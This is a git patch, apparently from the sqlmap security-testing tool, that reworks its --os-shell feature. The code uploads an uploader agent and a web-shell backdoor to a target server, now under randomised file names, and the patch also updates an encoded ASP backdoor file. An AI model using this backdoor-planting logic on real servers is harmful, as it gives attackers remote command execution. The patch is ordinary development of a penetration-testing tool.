From 2cafd5697b7a5c7d86956284b9d97f772679a5de Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 25 Feb 2010 10:33:41 +0000 Subject: [PATCH] new changes regarding --os-shell --- lib/takeover/web.py | 14 ++++++++------ shell/backdoor.asp_ | Bin 433 -> 427 bytes 2 files changed, 8 insertions(+), 6 deletions(-) diff --git a/lib/takeover/web.py b/lib/takeover/web.py index e9221d0a3..0512b772e 100644 --- a/lib/takeover/web.py +++ b/lib/takeover/web.py @@ -36,6 +36,7 @@ from lib.core.common import ntToPosixSlashes from lib.core.common import isWindowsPath from lib.core.common import normalizePath from lib.core.common import posixToNtSlashes +from lib.core.common import randomStr from lib.core.common import readInput from lib.core.convert import hexencode from lib.core.data import conf @@ -166,12 +167,12 @@ class Web: elif int(choice) < 1 or int(choice) > 3: logger.warn("invalid value, it must be 1 or 3") - backdoorName = "backdoor.%s" % self.webApi - backdoorStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, backdoorName + '_'), backdoorName) + backdoorName = "tmpb%s.%s" % (randomStr(4), self.webApi) + backdoorStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi), backdoorName) backdoorContent = backdoorStream.read() - uploaderName = "uploader.%s" % self.webApi - uploaderContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, uploaderName + '_')) + uploaderName = "tmpu%s.%s" % (randomStr(4), self.webApi) + uploaderContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "uploader.%s_" % self.webApi)) for directory in directories: # Upload the uploader agent @@ -181,8 +182,9 @@ class Web: if isWindowsPath(requestDir): requestDir = requestDir[2:] requestDir = normalizePath(requestDir) + self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, requestDir) - self.webUploaderUrl = "%s/%s" % (self.webBaseUrl, uploaderName) + self.webUploaderUrl = "%s/%s" % (self.webBaseUrl.rstrip('/'), uploaderName) self.webUploaderUrl = ntToPosixSlashes(self.webUploaderUrl.replace("./", "/")) uplPage, _ = Request.getPage(url=self.webUploaderUrl, direct=True, raise404=False) @@ -194,7 +196,7 @@ class Web: continue infoMsg = "the uploader agent has been successfully uploaded " - infoMsg += "on '%s'" % directory + infoMsg += "on '%s' ('%s')" % (directory, self.webUploaderUrl) logger.info(infoMsg) if self.webApi == "asp": diff --git a/shell/backdoor.asp_ b/shell/backdoor.asp_ index fe42624c9c4cc1af1a8da2a4b5c4242d1c67e291..4874c6039e1cf654de6bab54e89dee8c3f43a16f 100644 GIT binary patch delta 416 zcmV;R0bl;H1FHiLJtY@LPCh1CEGCOvurZMi7k_LXq%v|a)pAW4k&`k@bD9?xpk;k3 zLQ88Ke;a^bRBx-ugXR2~CtT2R+C{C)8^%Ll0ap1U6y6aeOhXP*nGNKDN zVs;`BCLeE{qJp|Mi=Zbetw42w#DharH)ro&rKMggZr4Z6Q@FeEQ%Sv4b4Tr9K33XX zc-v)@JW`4a2iZr`Kzs?p8@LZVe*jMT!hcZ8WvS4}rbHU;a%BwbTNwU~;SF|r$IM0E zA19KQ-ZE*Wn9|@KBrY~VB3LTAX8*j*eO1mOb@IXrIrJM=fDJ9l+$F__F*;()LGA_>WB K;XOT5lEFun_`Q7q delta 422 zcmV;X0a^a51F-`RJtY@LPCh1CEGEN)qrj047k{%$T3w!_6#=Rqqe@xG7NTT4JHT04 zZK0I(r=plknWV_geN7wCPn#@uK3mB^EYuoul-e^ta5vGQ1&yLCo6Vz$J}lxDR~aUQ z)~U#|=Ot_tH0C7LWDYS)m9z4K(MI2kclhhJSMhdq;1qTy=ukC+MakN415WD(YDW0CB?R zY-Q!(Voy&}GdVC;9!$M6)`&^V7CJabHkR3{)nPRRE3M=_X-aK7oEXe+jfL}3d%c7* zkW~jCyXo#}%`uj8oQnG;j7l_TE3-`Dcw62Pg3!%lq`^jG$NtLXL~Pz}Z&$7P%n!%m Q4^R7O4LV0Jki&zcz~X_&cmMzZ